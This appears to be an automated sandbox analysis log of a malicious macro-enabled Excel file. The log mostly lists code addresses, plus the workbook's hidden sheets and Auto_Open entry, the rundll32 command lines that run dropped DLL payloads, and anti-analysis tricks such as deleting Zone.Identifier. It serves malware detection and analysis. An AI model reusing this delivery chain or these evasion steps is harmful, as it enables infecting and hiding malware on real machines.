Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE0370	3_2_01EE0370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED6540	3_2_01ED6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA92F	3_2_01ECA92F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED9124	3_2_01ED9124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECF73B	3_2_01ECF73B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDCD35	3_2_01EDCD35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3D0C	3_2_01ED3D0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDBF0C	3_2_01EDBF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED590E	3_2_01ED590E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED970A	3_2_01ED970A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE10A	3_2_01EDE10A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC4D1E	3_2_01EC4D1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCB13	3_2_01ECCB13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED56E9	3_2_01ED56E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECC0EA	3_2_01ECC0EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC40E2	3_2_01EC40E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED40FE	3_2_01ED40FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC46FA	3_2_01EC46FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC1EFB	3_2_01EC1EFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED62F5	3_2_01ED62F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED4CF5	3_2_01ED4CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC84F0	3_2_01EC84F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE20CE	3_2_01EE20CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED10CD	3_2_01ED10CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC92C1	3_2_01EC92C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC2CC2	3_2_01EC2CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE1CDB	3_2_01EE1CDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC90D4	3_2_01EC90D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED28D5	3_2_01ED28D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED52D1	3_2_01ED52D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECF48A	3_2_01ECF48A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECA083	3_2_01ECA083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECFE9D	3_2_01ECFE9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDE899	3_2_01EDE899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDA29B	3_2_01EDA29B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED009A	3_2_01ED009A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0E97	3_2_01ED0E97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDCE90	3_2_01EDCE90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED0A93	3_2_01ED0A93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3A6C	3_2_01EC3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC6869	3_2_01EC6869
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECB464	3_2_01ECB464
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECEE60	3_2_01ECEE60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC387F	3_2_01EC387F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECFA78	3_2_01ECFA78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDB677	3_2_01EDB677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC544C	3_2_01EC544C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECAA4E	3_2_01ECAA4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED7445	3_2_01ED7445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED3043	3_2_01ED3043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECAE43	3_2_01ECAE43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ECCE5A	3_2_01ECCE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC6453	3_2_01EC6453
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED282D	3_2_01ED282D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3228	3_2_01EC3228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC9824	3_2_01EC9824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC243F	3_2_01EC243F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC3432	3_2_01EC3432
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC800A	3_2_01EC800A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EDC205	3_2_01EDC205
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EE261E	3_2_01EE261E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E439F10	3_2_6E439F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4377B4	3_2_6E4377B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43D530	3_2_6E43D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E431DE0	3_2_6E431DE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E433A90	3_2_6E433A90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E440380	3_2_6E440380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44E3A1	3_2_6E44E3A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E436070	3_2_6E436070
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4410C0	3_2_6E4410C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43A890	3_2_6E43A890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E43E890	3_2_6E43E890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4368B0	3_2_6E4368B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A243F	6_2_001A243F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A9824	6_2_001A9824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BEA55	6_2_001BEA55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AB464	6_2_001AB464
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C1291	6_2_001C1291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C20CE	6_2_001C20CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B10CD	6_2_001B10CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A92C1	6_2_001A92C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B40FE	6_2_001B40FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B9124	6_2_001B9124
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACF6E	6_2_001ACF6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3782	6_2_001B3782
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BDB87	6_2_001BDB87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C261E	6_2_001C261E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A800A	6_2_001A800A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BC205	6_2_001BC205
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3432	6_2_001A3432
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3228	6_2_001A3228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B282D	6_2_001B282D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACE5A	6_2_001ACE5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A6453	6_2_001A6453
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AAA4E	6_2_001AAA4E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A544C	6_2_001A544C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3043	6_2_001B3043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AAE43	6_2_001AAE43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B7445	6_2_001B7445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AFA78	6_2_001AFA78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A387F	6_2_001A387F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BB677	6_2_001BB677
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A6869	6_2_001A6869
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A3A6C	6_2_001A3A6C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AEE60	6_2_001AEE60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BA29B	6_2_001BA29B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B009A	6_2_001B009A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE899	6_2_001BE899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AFE9D	6_2_001AFE9D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0A93	6_2_001B0A93
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BCE90	6_2_001BCE90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0E97	6_2_001B0E97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AF48A	6_2_001AF48A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA083	6_2_001AA083
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C1CDB	6_2_001C1CDB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B52D1	6_2_001B52D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A90D4	6_2_001A90D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B28D5	6_2_001B28D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A2CC2	6_2_001A2CC2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A46FA	6_2_001A46FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A1EFB	6_2_001A1EFB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A84F0	6_2_001A84F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B62F5	6_2_001B62F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B4CF5	6_2_001B4CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AC0EA	6_2_001AC0EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B56E9	6_2_001B56E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A40E2	6_2_001A40E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A4D1E	6_2_001A4D1E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ACB13	6_2_001ACB13
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B970A	6_2_001B970A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE10A	6_2_001BE10A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B590E	6_2_001B590E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B3D0C	6_2_001B3D0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BBF0C	6_2_001BBF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AF73B	6_2_001AF73B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BCD35	6_2_001BCD35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA92F	6_2_001AA92F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B6540	6_2_001B6540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001C0370	6_2_001C0370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001ABD61	6_2_001ABD61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B1591	6_2_001B1591
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AB191	6_2_001AB191
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A7795	6_2_001A7795
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A358B	6_2_001A358B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A8D80	6_2_001A8D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A4B81	6_2_001A4B81
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B85B8	6_2_001B85B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A43BE	6_2_001A43BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A59BF	6_2_001A59BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BD7BE	6_2_001BD7BE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE3B5	6_2_001BE3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B89A2	6_2_001B89A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BE5A7	6_2_001BE5A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BDDA5	6_2_001BDDA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001B0BA4	6_2_001B0BA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A75D2	6_2_001A75D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A19C0	6_2_001A19C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001BEDED	6_2_001BEDED
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A51EC	6_2_001A51EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001AA3E7	6_2_001AA3E7

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E44AC90 appears 33 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6E431DE0 appears 97 times

Source: CC82.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk2
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk5
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk1
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk7
Source: DOC-0212.xlsm	Macro extractor: Sheet name: EFEWF
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk3
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk4
Source: DOC-0212.xlsm	Macro extractor: Sheet name: Buk6

Source: workbook.xml

Binary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D6BAC37D-0CE8-4F19-A286-32FB1AEC3273}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc",qEPqGlpBy	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DOC-0212.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDD92.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@8/7@2/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.6051013889

Source: EXCEL.EXE, 00000000.00000002.752639955.0000000004E90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.555654956.0000000001A80000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.694286014.0000000001DE0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.747848667.0000000002170000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: DOC-0212.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: CC82.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01EC13E7 push esi; retf	3_2_01EC13F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E456A93 push ecx; ret	3_2_6E456AA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_001A13E7 push esi; retf	6_2_001A13F0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

3_2_6E43E690

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\besta.ocx	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll	Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc (copy)

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\besta.ocx

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\besta.ocx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Hisdtuljbeshqtad\zvklxm.vbc:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VZZdgPFp2xiOJtfpv[1].dll

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_025E6753 rdtsc

0_2_025E6753

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E450927 FindFirstFileExW,

3_2_6E450927

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E44AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_6E44AB0C

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E43E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,

3_2_6E43E690

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6E431290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,

3_2_6E431290

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_025E6753 rdtsc

0_2_025E6753

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01ED07D2 mov eax, dword ptr fs:[00000030h]	3_2_01ED07D2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449990 mov eax, dword ptr fs:[00000030h]	3_2_6E449990
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E44EC0B mov ecx, dword ptr fs:[00000030h]	3_2_6E44EC0B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E4502CC mov eax, dword ptr fs:[00000030h]	3_2_6E4502CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449920 mov esi, dword ptr fs:[00000030h]	3_2_6E449920
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6E449920 mov eax, dword ptr fs:[00000030h]	3_2_6E449920
